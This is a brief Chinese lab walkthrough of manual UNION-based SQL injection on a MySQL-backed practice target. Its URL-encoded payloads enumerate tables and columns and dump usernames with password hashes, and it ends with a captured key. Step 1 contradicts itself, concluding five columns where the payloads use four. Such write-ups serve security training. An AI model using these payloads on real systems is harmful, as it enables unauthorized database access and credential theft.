SQL手工测试(MySQL数据库)

1.看到注入点，测试列字段数量，发现为4正常，为5出错，可知列数为5

2.找到数据库名mozhe_Discuz_StormGroup

3.查询表名?id=-1%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27

得到StormGroup_member,notice

4.查询列名

?id=-1%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

5.获取数据

?id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member

mozhe\356f589a7df439f6f744ff19bb8092c0

此时发现直接输入会账密错误，说明需要解码

6.将密码解码得到的结果也是始终不正确，考虑其他数据

id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member%20limit%201,1

mozhe\89f76612d6fbbeb12265a7300301f024

7.再次解密验证

8.成功啦，获得Key:mozhe69c92e07d1330df9daeaeea8738